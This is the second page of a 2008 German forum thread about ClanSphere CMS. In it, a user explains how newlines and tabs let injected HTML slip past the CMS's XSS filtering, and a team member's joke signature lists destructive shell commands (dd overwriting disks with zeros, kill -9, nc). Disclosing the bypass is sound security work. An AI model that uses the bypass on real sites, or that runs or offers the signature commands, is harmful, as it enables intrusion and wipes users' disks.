News - Features - Downloads - Forum - Team - Support - Switch View: Screen
Login - Registrierung - Passwort vergessen

Antworten: 30
Seite < 1 [2]
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 21 - 17.09.2008 um 18:38 Uhr
hm keine ahnung ob der grad genannte fehler auch direkt gefixt wurde, aber bei mir kommt da nur ne weiße seite. (auch im quelltext)

und das mit den spaces und tabs hab ich auch nicht verstanden. also ich weiß zwar was du meinst, aber nicht wo da ein problem liegt? wo soll eine überprüdung auf tabs stattfinden? und warum? und wo gibts es bereits eine für spaces, die du per tabs umgehen musst?

/e: scheint an firefox zu liegen, dass es bei mir nicht ging, mit chrome hats jetzt "funktioniert"


------------------
www.laszlokorte.de

Zuletzt editiert von SCHIRI ClanSphere Team am 17.09.2008 um 18:40 Uhr (1x Editiert)
Inaktiv
|
Swifter


Specialist





Beiträge: 1841
# Antwort: 22 - 17.09.2008 um 18:41 Uhr
bei mir gings mit FF... nice


------------------
Greetz Swifter


Wenn du dich klein, nutzlos, beleidigt und depressiv fühlst, denke immer daran: Du warst einmal das schnellste und erfolgreichste Spermium deiner Gruppe!


Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 23 - 17.09.2008 um 18:46 Uhr
danke!
muss gucken ob das in der svn version auch noch so ist.


Inaktiv
|
xsigndll
Thread-Ersteller


Try to beat me




Beiträge: 124
# Antwort: 24 - 17.09.2008 um 19:22 Uhr
17.09.2008 um 18:38 Uhr - SCHIRI:
hm keine ahnung ob der grad genannte fehler auch direkt gefixt wurde, aber bei mir kommt da nur ne weiße seite. (auch im quelltext)

und das mit den spaces und tabs hab ich auch nicht verstanden. also ich weiß zwar was du meinst, aber nicht wo da ein problem liegt? wo soll eine überprüdung auf tabs stattfinden? und warum? und wo gibts es bereits eine für spaces, die du per tabs umgehen musst?

/e: scheint an firefox zu liegen, dass es bei mir nicht ging, mit chrome hats jetzt "funktioniert"


Also das beste Bsp. für sowas ist immer wieder der myspace (glaube es war mypsace) XSS.
Bei MySpace kannst du HTML einfügen, aber kein Javascript. Dabei hat Myspace die HTML Sachen auf "javascript" hin überprüft, jedoch nciht mit den findigen Usern gerechnet. Z.B. ist folgendes valide:

onlick="java
script: alert('bla')"

(der Zeilenumbruch machts).

In wahrheit sieht das dann so aus: "java\nscript" und das wird eben nicht von dem myspace "javascript" gefiltert und durchgelassen. Daraufhin gab es eine der schwersten XSS Lücken im WWW, die sich mit exponentiell viraler Geschwindigkeit verbreitet hat.

Hier ist es ähnlich. Der Browser macht keinen Unterschied ob da steht:

<h1 style....>

ODER:

<h1 [HIER EINEN TAB DENKEN] style.....>

Von Clansphere wird aber %20 (also ein Leerzeichen) so escaped, dass man es nicht umgehen kann. Also benutzt man einen Tab und kommt somit durch die Filterung.

----------

Mit IE hab ichs nicht probiert - nur mit FF. Jeder Browser ist da anders


------------------
x!sign.dll - Full-Stack with a touch of DevOps
---
Facebook - x!sign.dll
Twitter - x!sign.dll
Instagram - x!sign.dll
Pinterest - x!sign.dll
LinkedIn - x!sign.dll
Tumblr - x!sign.dll
Flickr - x!sign.dll
Reddit - x!sign.dll

Zuletzt editiert von xsign am 17.09.2008 um 19:25 Uhr (1x Editiert)
Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 25 - 17.09.2008 um 19:36 Uhr
hm ich wüsste jetzt nichmal, dass clansphere leerzeichen exscaped. dein javascript innerHTML geht ja an jeglicher filterung vorbei. und die einzige filterung die es überhaupt gib escaped die <>.


------------------
www.laszlokorte.de

Inaktiv
|
xsigndll
Thread-Ersteller


Try to beat me




Beiträge: 124
# Antwort: 26 - 17.09.2008 um 19:43 Uhr
nein - z.b. gibt es den ' und " escape in CS
dem gegenüber steht der htmlspecialchars(), der quotes, <> etc. escaped
und dann gibts noch wischi-waschi BB-Code ersetzungen.


------------------
x!sign.dll - Full-Stack with a touch of DevOps
---
Facebook - x!sign.dll
Twitter - x!sign.dll
Instagram - x!sign.dll
Pinterest - x!sign.dll
LinkedIn - x!sign.dll
Tumblr - x!sign.dll
Flickr - x!sign.dll
Reddit - x!sign.dll

Inaktiv
|
n4g-Vienna-1


Rock the board





Beiträge: 73
# Antwort: 27 - 30.09.2008 um 18:11 Uhr
Also ganz einfach... solange ein CMS den Quellcode öffentlich stellt gibt es auch einen Hack.
Nicht umsonst gibt es CMS-Systeme um die 800 Euro und mehr wo ihr keinen öffentlichen Quellcode findet.

Wer eines braucht schreibt mich mal an. Hab da eines für nur 750 Euro inkl. lebenslanger Lizenz.
...Dann gibts auch keine schnellen Hacks


------------------
::.www.net4gamer.de.::

Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 28 - 30.09.2008 um 18:15 Uhr
na klar gibts auch dafür hacks...
langsam glaub ich echt, dass du, wie freeze schon gesagt hat, coints haben willst...
wenn es keine sicherheitslücken gibt gibts auch keine "hacks" für ein cms. wenn es lücken gibts, gibts auch "hacks" dafür, egal wie teuer das cms ist.
wer von denen die hier im forum lesen sucht denn bitte ein 1k¤ cms? wenn schon sinnlose posts bitte zielgruppenorientiert.


------------------
www.laszlokorte.de

Inaktiv
|
xsigndll
Thread-Ersteller


Try to beat me




Beiträge: 124
# Antwort: 29 - 01.10.2008 um 12:42 Uhr
lol zielgruppenorientierte sinnlosposts? ;D der is geil


------------------
x!sign.dll - Full-Stack with a touch of DevOps
---
Facebook - x!sign.dll
Twitter - x!sign.dll
Instagram - x!sign.dll
Pinterest - x!sign.dll
LinkedIn - x!sign.dll
Tumblr - x!sign.dll
Flickr - x!sign.dll
Reddit - x!sign.dll

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 30 - 01.10.2008 um 17:36 Uhr
Da diess Thema eigentlich schon lange durch ist, schiebe ich hier einmal den Riegel vor.


/closed


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|

Dieses Thema wurde von pHaeno* ClanSphere Team PM geschlossen.

Antworten: 30
Seite < 1 [2]




ClanSphere Project - Mailus - Imprint - Disclaimer - Scriptinfo